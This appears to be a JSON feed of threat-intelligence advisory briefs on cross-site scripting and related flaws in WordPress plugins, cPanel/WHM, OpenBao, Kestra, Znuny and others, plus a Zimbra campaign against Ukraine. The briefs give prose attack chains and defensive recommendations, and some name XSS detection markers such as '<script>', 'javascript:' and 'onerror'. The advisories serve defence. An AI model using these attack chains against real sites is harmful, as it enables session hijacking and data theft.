An unauthenticated attacker can exploit this by injecting malicious web scripts into pages, posing a threat to users who…\u003c/p\u003e\n","date_modified":"2026-03-31T12:16:31Z","date_published":"2026-03-31T12:16:31Z","id":"/briefs/2024-01-query-monitor-xss/","summary":"The Query Monitor WordPress plugin is vulnerable to reflected cross-site scripting (XSS) due to insufficient input sanitization and output escaping of the '$_SERVER['REQUEST_URI']' parameter, allowing unauthenticated attackers to inject arbitrary web scripts.","title":"Query Monitor WordPress Plugin Vulnerable to Reflected XSS (CVE-2026-4267)","url":"https://feed.craftedsignal.io/briefs/2024-01-query-monitor-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2025-10553"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","vulnerability","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stored cross-site scripting (XSS) vulnerability has been identified in DELMIA Factory Resource Manager, affecting versions from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x. This vulnerability, assigned CVE-2025-10553, allows an attacker to inject malicious JavaScript code into the application. 
When a user interacts with the affected component, the injected script executes within their browser, potentially leading to session hijacking, sensitive data theft, or defacement of…\u003c/p\u003e\n","date_modified":"2026-03-31T09:18:30Z","date_published":"2026-03-31T09:18:30Z","id":"/briefs/2026-04-delmia-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x (CVE-2025-10553) allows attackers to execute arbitrary script code within a user's browser session.","title":"DELMIA Factory Resource Manager Stored XSS Vulnerability (CVE-2025-10553)","url":"https://feed.craftedsignal.io/briefs/2026-04-delmia-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2025-10551"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","cve-2025-10551","enovia"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2025-10551 is a stored XSS vulnerability affecting the Document Management feature within ENOVIA Collaborative Industry Innovator. This vulnerability exists in versions from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x. A successful exploit allows an attacker to inject malicious JavaScript code into the application, which is then executed within the browser of any user who interacts with the compromised data.  
This poses a significant risk to data confidentiality and…\u003c/p\u003e\n","date_modified":"2026-03-31T09:16:21Z","date_published":"2026-03-31T09:16:21Z","id":"/briefs/2026-03-enovia-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in ENOVIA Collaborative Industry Innovator allows an attacker to execute arbitrary script code in a user's browser session by injecting malicious code into document management functions.","title":"ENOVIA Collaborative Industry Innovator Stored XSS Vulnerability (CVE-2025-10551)","url":"https://feed.craftedsignal.io/briefs/2026-03-enovia-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2026-32734"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","basercms"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ebaserCMS, a website development framework, is susceptible to DOM-based cross-site scripting (XSS) attacks in versions prior to 5.2.3. This vulnerability, identified as CVE-2026-32734, arises from the improper neutralization of input during the creation of tags. An attacker can exploit this by injecting malicious JavaScript code into the DOM, which is then executed in the victim\u0026rsquo;s browser when they interact with the crafted web page. 
Successful exploitation can lead to session hijacking…\u003c/p\u003e\n","date_modified":"2026-03-31T01:18:26Z","date_published":"2026-03-31T01:18:26Z","id":"/briefs/2026-04-basercms-xss/","summary":"baserCMS versions prior to 5.2.3 are vulnerable to DOM-based Cross-Site Scripting (XSS) due to improper neutralization of input during web page generation, potentially allowing a remote attacker to execute arbitrary JavaScript in a user's browser.","title":"baserCMS DOM-Based Cross-Site Scripting Vulnerability (CVE-2026-32734)","url":"https://feed.craftedsignal.io/briefs/2026-04-basercms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["openbao","vulnerability","security-bypass","xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenBao is susceptible to multiple vulnerabilities that can be exploited by unauthenticated remote attackers. The vulnerabilities allow attackers to bypass existing security measures and inject malicious scripts into the application, leading to Cross-Site Scripting (XSS) attacks. The exact versions affected are not specified in the provided source, but it is crucial to investigate all OpenBao deployments for potential exposure. Successful exploitation could lead to unauthorized access, data theft, or other malicious activities within the OpenBao environment. 
Defenders need to prioritize identifying and mitigating these vulnerabilities to prevent potential attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable OpenBao instance accessible remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting an endpoint susceptible to security bypass.\u003c/li\u003e\n\u003cli\u003eThe vulnerable OpenBao instance processes the crafted request, failing to properly enforce access controls.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to sensitive resources or functionality.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious payload into a vulnerable input field or parameter within OpenBao.\u003c/li\u003e\n\u003cli\u003eThe OpenBao application stores or reflects the malicious payload without proper sanitization.\u003c/li\u003e\n\u003cli\u003eWhen a user interacts with the injected payload, the malicious JavaScript code executes in their browser, potentially leading to session hijacking or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to significant security breaches. An attacker bypassing security measures could gain unauthorized access to sensitive data stored within OpenBao or manipulate configurations. The XSS vulnerabilities allow attackers to inject malicious scripts that can compromise user accounts, steal sensitive information, or deface the application. 
The number of potential victims depends on the scope of the OpenBao deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect OpenBao web server logs for suspicious HTTP requests containing unusual parameters or patterns that may indicate attempts to bypass security measures to activate the rule \u003ccode\u003eDetect OpenBao Security Bypass Attempts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eExamine OpenBao web server logs for unusual patterns indicative of XSS attacks, such as \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags or \u003ccode\u003ejavascript:\u003c/code\u003e URIs in request parameters with rule \u003ccode\u003eDetect OpenBao Cross-Site Scripting Attempts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor OpenBao web server logs for HTTP requests returning unexpected status codes (e.g., 3xx, 4xx, 5xx) in response to specific requests, which might indicate attempts to exploit vulnerabilities by enabling webserver logging.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T10:15:54Z","date_published":"2026-03-30T10:15:54Z","id":"/briefs/2026-03-openbao-vulns/","summary":"An anonymous, remote attacker can exploit multiple vulnerabilities in OpenBao to bypass security measures or conduct cross-site scripting attacks.","title":"OpenBao Multiple Vulnerabilities Allow Security Bypass and XSS","url":"https://feed.craftedsignal.io/briefs/2026-03-openbao-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kestra","xss","cve-2026-33664","orchestration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eKestra, an open-source, event-driven orchestration platform, is vulnerable to a reflected cross-site scripting (XSS) vulnerability, identified as CVE-2026-33664. This flaw resides in versions up to and including 1.3.3. 
The application fails to properly sanitize user-supplied flow YAML metadata fields, specifically \u003ccode\u003edescription\u003c/code\u003e, \u003ccode\u003einputs[].displayName\u003c/code\u003e, and \u003ccode\u003einputs[].description\u003c/code\u003e. These fields are rendered through the \u003ccode\u003eMarkdown.vue\u003c/code\u003e component with \u003ccode\u003ehtml: true\u003c/code\u003e, resulting in unsanitized HTML…\u003c/p\u003e\n","date_modified":"2026-03-27T12:00:00Z","date_published":"2026-03-27T12:00:00Z","id":"/briefs/2026-03-kestra-xss/","summary":"Kestra versions up to 1.3.3 are vulnerable to a cross-site scripting (XSS) vulnerability (CVE-2026-33664) allowing arbitrary JavaScript execution by viewing crafted flow metadata.","title":"Kestra Orchestration Platform XSS Vulnerability (CVE-2026-33664)","url":"https://feed.craftedsignal.io/briefs/2026-03-kestra-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","ory-polis","cve-2026-33506","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOry Polis, formerly known as BoxyHQ Jackson, is a service that bridges or proxies SAML login flows to OAuth 2.0 or OpenID Connect. A DOM-based Cross-Site Scripting (XSS) vulnerability has been identified in versions of Ory Polis prior to 26.2.0. This vulnerability arises from the application\u0026rsquo;s improper trust of the \u003ccode\u003ecallbackUrl\u003c/code\u003e URL parameter within its login functionality. An attacker can exploit this by crafting a malicious link containing JavaScript code within the \u003ccode\u003ecallbackUrl\u003c/code\u003e. 
When a…\u003c/p\u003e\n","date_modified":"2026-03-26T19:17:05Z","date_published":"2026-03-26T19:17:05Z","id":"/briefs/2024-01-ory-polis-xss/","summary":"Ory Polis versions prior to 26.2.0 are vulnerable to DOM-based XSS due to improper handling of the `callbackUrl` parameter, allowing attackers to execute arbitrary JavaScript in a user's browser.","title":"Ory Polis DOM-based XSS Vulnerability (CVE-2026-33506)","url":"https://feed.craftedsignal.io/briefs/2024-01-ory-polis-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["wordpress","xss","cve-2026-2231"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-2231 describes a stored cross-site scripting (XSS) vulnerability within the Fluent Booking WordPress plugin. This vulnerability affects all versions up to and including 2.0.01. The root cause is insufficient input sanitization and output escaping of multiple parameters handled by the plugin. An unauthenticated attacker can exploit this vulnerability to inject malicious JavaScript code into the WordPress site. The injected script executes in the context of the victim\u0026rsquo;s browser when they access the page containing the injected code, potentially leading to session hijacking, defacement, or other malicious activities. 
Successful exploitation grants the attacker the same privileges as the victim user.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker identifies a vulnerable parameter within the Fluent Booking plugin, specifically related to booking data.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker submits a request to the WordPress site with the crafted payload embedded within the vulnerable parameter (e.g., booking name, location, or other fields).\u003c/li\u003e\n\u003cli\u003eThe WordPress server stores the malicious payload in the database due to insufficient sanitization.\u003c/li\u003e\n\u003cli\u003eA legitimate user (e.g., an administrator or another user viewing bookings) accesses a page displaying the stored booking data.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript code embedded in the booking data is rendered in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe injected script executes in the context of the user\u0026rsquo;s session.\u003c/li\u003e\n\u003cli\u003eThe attacker can potentially steal cookies, redirect the user to a malicious website, or perform other actions with the user\u0026rsquo;s privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of a logged-in user\u0026rsquo;s browser. This can lead to account compromise, including administrator accounts, potentially leading to full control of the WordPress website. Website defacement, data theft, and redirection to phishing sites are also potential impacts. 
Given the widespread use of WordPress and the Fluent Booking plugin, a successful widespread exploit could affect a large number of websites.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Fluent Booking plugin to a version greater than 2.0.01 to patch CVE-2026-2231.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious URI Parameters in WordPress\u003c/code\u003e to detect potential XSS attempts against WordPress sites.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious URI parameters and user input, as detected by the \u003ccode\u003eDetect WordPress XSS via URI Parameters\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to filter out common XSS payloads.\u003c/li\u003e\n\u003cli\u003eRegularly audit and sanitize user input within WordPress plugins and themes to prevent stored XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T14:16:09Z","date_published":"2026-03-26T14:16:09Z","id":"/briefs/2026-03-fluentbooking-xss/","summary":"The Fluent Booking plugin for WordPress is vulnerable to stored cross-site scripting (XSS) allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page, affecting versions up to and including 2.0.01.","title":"Fluent Booking WordPress Plugin Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-fluentbooking-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","plugin","cve-2026-4329"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Blackhole for Bad Bots plugin for WordPress, up to and including version 3.8, contains a stored cross-site scripting (XSS) vulnerability. 
The vulnerability stems from insufficient input sanitization and output escaping of the User-Agent HTTP header when capturing bot data. Specifically, the plugin uses \u003ccode\u003esanitize_text_field()\u003c/code\u003e which strips HTML tags but does not escape HTML entities. This data is then stored using \u003ccode\u003eupdate_option()\u003c/code\u003e and later displayed on the Bad Bots log page. The stored data is output into HTML input value attributes and HTML span content without proper escaping via \u003ccode\u003eesc_attr()\u003c/code\u003e or \u003ccode\u003eesc_html()\u003c/code\u003e. This allows an unauthenticated attacker to inject arbitrary web scripts that are executed when an administrator views the Blackhole Bad Bots admin page, potentially leading to privilege escalation or other malicious actions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker sends a request to the WordPress site with a malicious User-Agent header containing XSS payload.\u003c/li\u003e\n\u003cli\u003eThe Blackhole for Bad Bots plugin captures the User-Agent string using \u003ccode\u003esanitize_text_field()\u003c/code\u003e, which inadequately sanitizes the input.\u003c/li\u003e\n\u003cli\u003eThe plugin stores the inadequately sanitized User-Agent string in the WordPress options database using \u003ccode\u003eupdate_option()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eA WordPress administrator navigates to the Blackhole Bad Bots admin page.\u003c/li\u003e\n\u003cli\u003eThe plugin retrieves the stored User-Agent strings from the database.\u003c/li\u003e\n\u003cli\u003eThe plugin outputs the stored User-Agent string directly into HTML input value attributes (lines 75-83) without \u003ccode\u003eesc_attr()\u003c/code\u003e and into HTML span content without \u003ccode\u003eesc_html()\u003c/code\u003e on the admin page.\u003c/li\u003e\n\u003cli\u003eThe administrator\u0026rsquo;s 
browser executes the injected XSS payload.\u003c/li\u003e\n\u003cli\u003eThe XSS payload can perform actions such as stealing the administrator\u0026rsquo;s session cookie, redirecting the administrator to a malicious site, or performing actions on behalf of the administrator.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows unauthenticated attackers to inject arbitrary web scripts that execute in the context of an administrator\u0026rsquo;s browser session. This can lead to various malicious outcomes, including account takeover, data theft, and defacement of the WordPress site. Given the widespread use of WordPress and the Blackhole for Bad Bots plugin, a successful exploit could impact a significant number of websites.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Blackhole for Bad Bots plugin to a version greater than 3.8 to remediate CVE-2026-4329.\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) rule to filter requests containing suspicious User-Agent headers that might exploit CVE-2026-4329.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests with unusual or potentially malicious User-Agent strings to detect potential exploitation attempts related to CVE-2026-4329.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T05:16:40Z","date_published":"2026-03-26T05:16:40Z","id":"/briefs/2024-01-11-wordpress-blackhole-xss/","summary":"The Blackhole for Bad Bots WordPress plugin through version 3.8 is vulnerable to stored cross-site scripting (XSS) via the User-Agent HTTP header, allowing unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the plugin's admin page.","title":"Blackhole for Bad Bots WordPress Plugin Stored XSS 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-11-wordpress-blackhole-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cPanel","WHM","XSS","SSRF","vulnerability"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in cPanel/WHM, a widely used web hosting control panel. An anonymous, remote attacker can exploit these vulnerabilities to compromise cPanel/WHM installations. The vulnerabilities allow an attacker to bypass security measures, perform Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) attacks, disclose sensitive information, and potentially execute arbitrary code on the server. These vulnerabilities pose a significant risk to organizations relying on cPanel/WHM for web hosting, potentially leading to data breaches, service disruption, and unauthorized access to sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable cPanel/WHM instance exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request exploiting an identified SSRF vulnerability to probe internal network resources.\u003c/li\u003e\n\u003cli\u003eSuccessful SSRF exploitation allows the attacker to identify internal services and gather information about the server architecture.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages an XSS vulnerability by injecting malicious JavaScript code into a cPanel/WHM page.\u003c/li\u003e\n\u003cli\u003eUnsuspecting users interacting with the compromised page execute the attacker\u0026rsquo;s JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the XSS payload to steal user session cookies or credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to bypass authentication and gain unauthorized access to 
cPanel/WHM.\u003c/li\u003e\n\u003cli\u003eWith elevated privileges, the attacker can potentially execute arbitrary code on the server, leading to full system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to severe consequences. An attacker could gain unauthorized access to sensitive data, including customer databases, configuration files, and source code. XSS attacks could deface websites and phish users. SSRF attacks can expose internal network resources. Remote code execution can lead to complete server takeover and potentially impact a large number of hosted websites and services. This can result in significant financial losses, reputational damage, and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious cPanel/WHM HTTP Request\u003c/code\u003e to identify potential SSRF attempts within cPanel/WHM webserver logs.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect cPanel/WHM XSS Attempt\u003c/code\u003e to detect potential XSS payloads being injected into cPanel/WHM.\u003c/li\u003e\n\u003cli\u003eClosely monitor web server logs for unusual activity originating from cPanel/WHM servers using the \u003ccode\u003ewebserver\u003c/code\u003e category.\u003c/li\u003e\n\u003cli\u003eImplement strong input validation and output encoding to prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eHarden cPanel/WHM configurations to restrict SSRF attack vectors and limit access to internal resources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:11:04Z","date_published":"2026-03-24T12:11:04Z","id":"/briefs/2026-03-cpanel-vulns/","summary":"An anonymous remote attacker can exploit multiple vulnerabilities in cPanel/WHM to bypass security measures, perform XSS and SSRF attacks, disclose 
information, and potentially execute code.","title":"Multiple Vulnerabilities in cPanel/WHM","url":"https://feed.craftedsignal.io/briefs/2026-03-cpanel-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["znuny","xss","cross-site scripting","web application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA vulnerability exists in Znuny, a web-based ticketing system, that can be exploited by an unauthenticated, remote attacker. The specific nature of the vulnerability is Cross-Site Scripting (XSS). Successful exploitation could allow the attacker to inject malicious scripts into the web pages served by Znuny. These scripts could then be executed in the context of other users\u0026rsquo; browsers, potentially leading to session hijacking, information disclosure, or defacement of the Znuny interface. Given the wide use of ticketing systems in enterprise environments, this vulnerability poses a risk to organizations using Znuny. The vendor should be consulted for patch information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Znuny endpoint susceptible to XSS. This could be a form field, URL parameter, or other user-controlled input.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code designed to execute in the victim\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the payload into the vulnerable Znuny endpoint. 
This can be done through a crafted URL or form submission.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the compromised Znuny endpoint.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the malicious JavaScript code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious script steals the user\u0026rsquo;s session cookie or other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to authenticate as the victim user.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the victim\u0026rsquo;s Znuny account and performs malicious actions, such as viewing sensitive tickets, modifying configurations, or escalating privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability in Znuny could lead to unauthorized access to sensitive information stored within the ticketing system. This could include customer data, internal communications, and security-related information. The impact could range from minor information disclosure to complete compromise of the Znuny installation, depending on the privileges of the compromised user. The number of victims depends on the user base of the affected Znuny instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for unusual patterns in HTTP requests targeting the Znuny application. Focus on requests containing suspicious characters commonly used in XSS attacks (\u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e, \u003ccode\u003eonerror\u003c/code\u003e, \u003ccode\u003ejavascript:\u003c/code\u003e, etc.) 
as detailed in the \u003ccode\u003eDetect Suspicious Znuny URL Parameters\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding mechanisms within the Znuny application to prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections originating from the Znuny server using the \u003ccode\u003eDetect Znuny Process Outbound Network Activity\u003c/code\u003e Sigma rule. Note that an XSS payload executes in the victim\u0026rsquo;s browser, so data it steals leaves from the victim\u0026rsquo;s endpoint rather than from the server; this rule catches follow-on server-side compromise, not the XSS itself.\u003c/li\u003e\n\u003cli\u003eConsult the Znuny vendor\u0026rsquo;s website or security advisories for available patches and apply them immediately.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T10:35:57Z","date_published":"2026-03-24T10:35:57Z","id":"/briefs/2026-03-znuny-xss/","summary":"An anonymous remote attacker can exploit a vulnerability in Znuny to perform a cross-site scripting attack, potentially leading to information disclosure or session hijacking.","title":"Znuny Cross-Site Scripting Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-znuny-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","connect-cms","cabinet-plugin"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA DOM-based Cross-Site Scripting (XSS) vulnerability has been identified in the Cabinet Plugin of Connect-CMS. This vulnerability affects versions 1.35.0 through 1.41.0 of the 1.x series and versions 2.35.0 through 2.41.0 of the 2.x series. Discovered by Sho Odagiri of GMO Cybersecurity by Ierae, Inc., the flaw resides in the Cabinet Plugin\u0026rsquo;s list view, stemming from the rendering of saved names. Exploitation requires an attacker to authenticate and access the affected functionality. 
Successful exploitation allows arbitrary script execution within the victim\u0026rsquo;s browser, potentially leading to unauthorized actions, such as session hijacking, or information theft. Organizations using the Connect-CMS Cabinet Plugin are urged to update to versions 1.41.1 or 2.41.1 to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Connect-CMS application with valid credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Cabinet Plugin list view.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eAttacker saves a new cabinet or modifies an existing cabinet\u0026rsquo;s name, injecting the malicious payload into the name field.\u003c/li\u003e\n\u003cli\u003eThe application saves the cabinet name with the injected XSS payload.\u003c/li\u003e\n\u003cli\u003eWhen a victim user views the Cabinet Plugin list view, the malicious payload is rendered in their browser without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the injected JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to perform actions on behalf of the victim, such as stealing cookies or redirecting to a malicious website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can allow an attacker to execute arbitrary JavaScript code in the victim\u0026rsquo;s browser. This could lead to session hijacking, where the attacker gains control of the victim\u0026rsquo;s account. Sensitive information, such as authentication tokens or personal data, could be stolen. 
The attacker could also redirect the victim to a phishing site or deface the Connect-CMS installation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Connect-CMS to version 1.41.1 or 2.41.1 to patch the XSS vulnerability (CVE-2026-32277).\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) rule to detect and block common XSS payloads in requests to the Cabinet Plugin list view.\u003c/li\u003e\n\u003cli\u003eEnable strict Content Security Policy (CSP) headers to prevent the execution of inline JavaScript and mitigate the impact of potential XSS attacks.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding on the Cabinet Plugin\u0026rsquo;s name field to prevent the injection of malicious code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T20:35:48Z","date_published":"2026-03-23T20:35:48Z","id":"/briefs/2024-01-03-connect-cms-xss/","summary":"A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the Cabinet Plugin list view of Connect-CMS, affecting versions 1.35.0 to 1.41.0 and 2.35.0 to 2.41.0, which can lead to arbitrary script execution in the victim's browser.","title":"Connect-CMS Cabinet Plugin DOM-based XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-03-connect-cms-xss/"},{"_cs_actors":["Russian APT"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["zimbra","xss","ukraine","apt"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eA Russian APT group is conducting a campaign, known as \u0026ldquo;Operation GhostMail,\u0026rdquo; targeting the Ukrainian government. The attackers are leveraging a cross-site scripting (XSS) vulnerability in Zimbra collaboration suite to gain unauthorized access. While the specific vulnerability (CVE) is not provided in the source material, the attackers are clearly focused on exploiting this weakness. 
The operation highlights the ongoing cyber conflict impacting Ukraine. Defenders need to focus on detecting exploitation attempts against Zimbra and anomalous activity originating from compromised email accounts. The scope of this campaign appears limited to the Ukrainian government sector.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Zimbra server within the Ukrainian government infrastructure.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious email containing a specially crafted XSS payload.\u003c/li\u003e\n\u003cli\u003eThe victim receives the email and opens it within the Zimbra webmail client.\u003c/li\u003e\n\u003cli\u003eThe XSS payload executes within the victim\u0026rsquo;s browser, allowing the attacker to steal the victim\u0026rsquo;s Zimbra session cookie.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to authenticate to the Zimbra webmail client as the victim.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to the victim\u0026rsquo;s email account, contacts, and calendar.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised email account to send further phishing emails to other targets within the Ukrainian government, escalating the attack.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive information from the compromised mailboxes and possibly pivots to other internal systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis campaign is focused on espionage and potential disruption of Ukrainian government operations. Successful exploitation leads to unauthorized access to sensitive email communications, contact lists, and calendar information. Compromised email accounts can be used to spread further phishing attacks within the government, increasing the scope of the breach. 
